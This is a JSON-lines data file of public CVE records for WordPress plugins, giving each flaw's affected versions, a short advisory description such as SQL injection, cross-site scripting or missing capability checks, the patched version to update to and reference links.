{"CVE_ID":"CVE-2023-6065","slug":"quttera-web-malware-scanner","versionImpact":"3.4.1.48","versionEndExcluding":"3.4.2.1","description":"The Quttera Web Malware Scanner WordPress plugin before 3.4.2.1 doesn't restrict access to detailed scan logs, which allows a malicious actor to discover local paths and portions of the site's code","recommendation":"Update to version 3.4.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/64f2557f-c5e4-4779-9e28-911dfaf2dda5\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/64f2557f-c5e4-4779-9e28-911dfaf2dda5\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/drive.google.com\\\/file\\\/d\\\/1w83xWsVLS_gCpQy4LDwbjNK9JaB87EEf\\\/view?usp=sharing\",\"name\":\"https:\\\/\\\/drive.google.com\\\/file\\\/d\\\/1w83xWsVLS_gCpQy4LDwbjNK9JaB87EEf\\\/view?usp=sharing\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13480","slug":"ltl-freight-quotes-fedex-freight-edition","versionImpact":"3.4.1","versionEndExcluding":"3.4.2","description":"The LTL Freight Quotes \u2013 For Customers of FedEx Freight plugin for WordPress is vulnerable to SQL Injection via the 'edit_id' and 'dropship_edit_id' parameters in all versions up to, and including, 3.4.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3238359%40ltl-freight-quotes-fedex-freight-edition&new=3238359%40ltl-freight-quotes-fedex-freight-edition&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3238359%40ltl-freight-quotes-fedex-freight-edition&new=3238359%40ltl-freight-quotes-fedex-freight-edition&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a9b6f7a3-83eb-4352-9db6-ab4b03241702?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a9b6f7a3-83eb-4352-9db6-ab4b03241702?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5110","slug":"bsk-pdf-manager","versionImpact":"3.4.1","versionEndExcluding":"3.4.2","description":"The BSK PDF Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'bsk-pdfm-category-dropdown' shortcode in versions up to, and including, 3.4.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bsk-pdf-manager\\\/trunk\\\/classes\\\/shortcodes\\\/category\\\/category-dropdown.php?rev=2885460#L36\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bsk-pdf-manager\\\/trunk\\\/classes\\\/shortcodes\\\/category\\\/category-dropdown.php?rev=2885460#L36\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/60de55c6-e4fa-453e-84bd-309f2887e3cb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/60de55c6-e4fa-453e-84bd-309f2887e3cb?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5419","slug":"funnelforms-free","versionImpact":"3.4","versionEndExcluding":"3.4.2","description":"The Funnelforms Free plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the fnsf_af2_test_mail function in versions up to, and including, 3.4. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to send test emails to an arbitrary email address.","recommendation":"Update to version 3.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/64248d15-e6a7-442f-b269-e9f629d297d3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/64248d15-e6a7-442f-b269-e9f629d297d3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2986938\\\/funnelforms-free\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2986938\\\/funnelforms-free\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1478","slug":"hummingbird-performance","versionEndExcluding":"3.4.2","description":"The Hummingbird WordPress plugin before 3.4.2 does not validate the generated file path for page cache files before writing them, leading to a path traversal vulnerability in the page cache module.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/512a9ba4-01c0-4614-a991-efdc7fe51abe\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/512a9ba4-01c0-4614-a991-efdc7fe51abe\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5417","slug":"funnelforms-free","versionImpact":"3.4","versionEndExcluding":"3.4.2","description":"The Funnelforms Free plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the fnsf_update_category function in versions up to, and including, 3.4. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to modify the Funnelforms category for a given post ID.","recommendation":"Update to version 3.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/148794ea-3bc9-4084-bdb9-6ee63a781a39?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/148794ea-3bc9-4084-bdb9-6ee63a781a39?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2986938\\\/funnelforms-free\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2986938\\\/funnelforms-free\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5416","slug":"funnelforms-free","versionImpact":"3.4","versionEndExcluding":"3.4.2","description":"The Funnelforms Free plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the fnsf_delete_category function in versions up to, and including, 3.4. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to delete categories.","recommendation":"Update to version 3.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/992fc98f-4b23-4596-81fb-5543d82fd615?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/992fc98f-4b23-4596-81fb-5543d82fd615?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2986938\\\/funnelforms-free\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2986938\\\/funnelforms-free\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5415","slug":"funnelforms-free","versionImpact":"3.4","versionEndExcluding":"3.4.2","description":"The Funnelforms Free plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the fnsf_add_category function in versions up to, and including, 3.4. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to add new categories.","recommendation":"Update to version 3.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6ec3051e-a5e4-48ee-8f8e-eb5dbc482f33?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6ec3051e-a5e4-48ee-8f8e-eb5dbc482f33?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2986938\\\/funnelforms-free\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2986938\\\/funnelforms-free\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5411","slug":"funnelforms-free","versionImpact":"3.4","versionEndExcluding":"3.4.2","description":"The Funnelforms Free plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the fnsf_af2_save_post function in versions up to, and including, 3.4. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to modify certain post values. Note that the extent of modification is limited due to fixed values passed to the wp_update_post function.","recommendation":"Update to version 3.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/816f5fc1-e4e6-4c0d-b222-fe733f026e33?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/816f5fc1-e4e6-4c0d-b222-fe733f026e33?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2986938\\\/funnelforms-free\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2986938\\\/funnelforms-free\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5387","slug":"funnelforms-free","versionImpact":"3.4","versionEndExcluding":"3.4.2","description":"The Funnelforms Free plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the fnsf_af2_trigger_dark_mode function in versions up to, and including, 3.4. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to enable or disable the dark mode plugin setting.","recommendation":"Update to version 3.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ccb34b44-9fa4-4ebe-b217-b2a42920247f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ccb34b44-9fa4-4ebe-b217-b2a42920247f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2986938\\\/funnelforms-free\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2986938\\\/funnelforms-free\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5386","slug":"funnelforms-free","versionImpact":"3.4","versionEndExcluding":"3.4.2","description":"The Funnelforms Free plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the fnsf_delete_posts function in versions up to, and including, 3.4. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to delete arbitrary posts, including administrator posts, and posts not related to the Funnelforms Free plugin.","recommendation":"Update to version 3.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/400fe58b-8203-4fd5-a3d3-d30eb1b8cd85?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/400fe58b-8203-4fd5-a3d3-d30eb1b8cd85?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2986938\\\/funnelforms-free\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2986938\\\/funnelforms-free\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5385","slug":"funnelforms-free","versionImpact":"3.4","versionEndExcluding":"3.4.2","description":"The Funnelforms Free plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the fnsf_copy_posts function in versions up to, and including, 3.4. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to create copies of arbitrary posts.","recommendation":"Update to version 3.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e2719afc-e52c-4fcc-b030-2f6aaddb5ab9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e2719afc-e52c-4fcc-b030-2f6aaddb5ab9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2986938\\\/funnelforms-free\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2986938\\\/funnelforms-free\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5383","slug":"funnelforms-free","versionImpact":"3.4","versionEndExcluding":"3.4.2","description":"The Funnelforms Free plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.4. This is due to missing or incorrect nonce validation on the fnsf_copy_posts function. This makes it possible for unauthenticated attackers to create copies of arbitrary posts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 3.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d35ec0f0-fa7a-4531-b5f7-5adcf2af051c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d35ec0f0-fa7a-4531-b5f7-5adcf2af051c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2986938\\\/funnelforms-free\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2986938\\\/funnelforms-free\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5382","slug":"funnelforms-free","versionImpact":"3.4","versionEndExcluding":"3.4.2","description":"The Funnelforms Free plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.4. This is due to missing or incorrect nonce validation on the fnsf_delete_posts function. This makes it possible for unauthenticated attackers to delete arbitrary posts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 3.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72e4428b-d2cd-471f-9821-947f4601fd64?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72e4428b-d2cd-471f-9821-947f4601fd64?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2986938\\\/funnelforms-free\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2986938\\\/funnelforms-free\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6554","slug":"branda-white-labeling","versionImpact":"3.4.18","versionEndExcluding":"3.4.19","description":"The Branda \u2013 White Label WordPress, Custom Login Page Customizer plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 3.4.18. This is due the plugin utilizing composer without preventing direct access to the files. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"Update to version 3.4.19, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a79eb25-a7d1-4102-97e6-8fa8db9ed03e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a79eb25-a7d1-4102-97e6-8fa8db9ed03e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/branda-white-labeling\\\/trunk\\\/misc\\\/composer\\\/prefix-fixer.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/branda-white-labeling\\\/trunk\\\/misc\\\/composer\\\/prefix-fixer.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3115603%40branda-white-labeling&new=3115603%40branda-white-labeling&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3115603%40branda-white-labeling&new=3115603%40branda-white-labeling&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5191","slug":"branda-white-labeling","versionImpact":"3.4.17","versionEndExcluding":"3.4.18","description":"The Branda \u2013 White Label WordPress, Custom Login Page Customizer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018mime_types\u2019 parameter in all versions up to, and including, 3.4.17 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.4.18, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31f4bad5-3a11-42c6-a336-6bd178ab5113?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31f4bad5-3a11-42c6-a336-6bd178ab5113?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/branda-white-labeling\\\/tags\\\/3.4.17\\\/inc\\\/modules\\\/utilities\\\/images.php#L58\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/branda-white-labeling\\\/tags\\\/3.4.17\\\/inc\\\/modules\\\/utilities\\\/images.php#L58\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3104910\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3104910\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5482","slug":"sunshine-photo-cart","versionImpact":"3.4.11","versionEndExcluding":"3.4.12","description":"The Sunshine Photo Cart: Free Client Photo Galleries for Photographers plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 3.4.11. This is due to the plugin not properly validating a user-supplied key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to change arbitrary user's passwords through the password reset functionality, including administrators, and leverage that to reset the user's password and gain access to their account.","recommendation":"Update to version 3.4.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sunshine-photo-cart\\\/trunk\\\/includes\\\/functions\\\/account.php#L303\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sunshine-photo-cart\\\/trunk\\\/includes\\\/functions\\\/account.php#L303\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3305406%40sunshine-photo-cart%2Ftrunk&old=3261773%40sunshine-photo-cart%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3305406%40sunshine-photo-cart%2Ftrunk&old=3261773%40sunshine-photo-cart%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5311b43c-14dd-4bdd-b6d0-d6468b831968?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5311b43c-14dd-4bdd-b6d0-d6468b831968?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1291","slug":"kadence-blocks","versionImpact":"3.4.9","versionEndExcluding":"3.4.10","description":"The Gutenberg Blocks with AI by Kadence WP \u2013 Page Builder Features plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018icon\u2019 parameter in all versions up to, and including, 3.4.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.4.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kadence-blocks\\\/trunk\\\/includes\\\/blocks\\\/class-kadence-blocks-testimonial-block.php#L219\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kadence-blocks\\\/trunk\\\/includes\\\/blocks\\\/class-kadence-blocks-testimonial-block.php#L219\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246675\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246675\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9df00907-c95e-445c-b424-78a1e5e00e4f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9df00907-c95e-445c-b424-78a1e5e00e4f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2640","slug":"watu","versionImpact":"3.4.1.1","versionEndExcluding":"3.4.1.2","description":"The Watu Quiz WordPress plugin before 3.4.1.2 does not sanitise and escape some of its settings, which could allow users such as authors (if they've been authorized by admins) to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.","recommendation":"Update to version 3.4.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d46db635-9d84-4268-a789-406a0db4cccf\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d46db635-9d84-4268-a789-406a0db4cccf\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-37391","slug":"wordpress-mobile-pack","versionEndExcluding":"3.4.1","description":"Cross-Site Request Forgery (CSRF) vulnerability in WPMobilePack.Com WordPress Mobile Pack \u2013 Mobile Plugin for Progressive Web Apps & Hybrid Mobile Apps plugin <=\u00a03.4.1 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wordpress-mobile-pack\\\/wordpress-wordpress-mobile-pack-plugin-3-4-1-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wordpress-mobile-pack\\\/wordpress-wordpress-mobile-pack-plugin-3-4-1-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-45105","slug":"affiliate-toolkit-starter","versionEndExcluding":"3.4.0","description":"URL Redirection to Untrusted Site ('Open Redirect') vulnerability in SERVIT Software Solutions affiliate-toolkit \u2013 WordPress Affiliate Plugin. This issue affects affiliate-toolkit \u2013 WordPress Affiliate Plugin: from n\/a through 3.3.9.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/affiliate-toolkit-starter\\\/wordpress-affiliate-toolkit-wordpress-affiliate-plugin-plugin-3-3-9-open-redirection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/affiliate-toolkit-starter\\\/wordpress-affiliate-toolkit-wordpress-affiliate-plugin-plugin-3-3-9-open-redirection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10878","slug":"sugar-calendar-lite","versionImpact":"3.3.0","versionEndExcluding":"3.4.0","description":"The Sugar Calendar \u2013 Simple Event Management plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 3.3.0. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sugar-calendar-lite\\\/tags\\\/3.3.0\\\/includes\\\/common\\\/Features\\\/EventTicketing\\\/includes\\\/admin\\\/orders-list-table.php#L50\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sugar-calendar-lite\\\/tags\\\/3.3.0\\\/includes\\\/common\\\/Features\\\/EventTicketing\\\/includes\\\/admin\\\/orders-list-table.php#L50\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188760\\\/sugar-calendar-lite\\\/trunk\\\/includes\\\/common\\\/Features\\\/EventTicketing\\\/includes\\\/admin\\\/orders-list-table.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188760\\\/sugar-calendar-lite\\\/trunk\\\/includes\\\/common\\\/Features\\\/EventTicketing\\\/includes\\\/admin\\\/orders-list-table.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b06cb3cf-e2da-4e18-9a09-c30cebddf5c2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b06cb3cf-e2da-4e18-9a09-c30cebddf5c2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3268","slug":"youtube-showcase","versionImpact":"3.3.6","versionEndExcluding":"3.4.0","description":"The YouTube Video Gallery by YouTube Showcase \u2013 Video Gallery Plugin for WordPress plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the emd_form_builder_lite_submit_form function in all versions up to, and including, 3.3.6. This makes it possible for unauthenticated attackers to create arbitrary posts or pages.","recommendation":"Update to version 3.4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e9d5382-d37d-4a40-8f22-e32b8ee98859?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e9d5382-d37d-4a40-8f22-e32b8ee98859?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3088363\\\/youtube-showcase\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3088363\\\/youtube-showcase\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5192","slug":"funnel-builder","versionImpact":"3.3.1","versionEndExcluding":"3.4.0","description":"The Funnel Builder for WordPress by FunnelKit \u2013 Customize WooCommerce Checkout Pages, Create Sales Funnels, Order Bumps & One Click Upsells plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018mimes\u2019 parameter in all versions up to, and including, 3.3.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2b77703e-b3d3-4105-a162-0afe86d5b3eb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2b77703e-b3d3-4105-a162-0afe86d5b3eb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/funnel-builder\\\/tags\\\/3.3.1\\\/modules\\\/checkouts\\\/includes\\\/class-wfacp-common.php#L52\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/funnel-builder\\\/tags\\\/3.3.1\\\/modules\\\/checkouts\\\/includes\\\/class-wfacp-common.php#L52\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/funnel-builder\\\/trunk\\\/modules\\\/checkouts\\\/includes\\\/class-wfacp-common-helper.php#L19\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/funnel-builder\\\/trunk\\\/modules\\\/checkouts\\\/includes\\\/class-wfacp-common-helper.php#L19\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3107500\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3107500\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
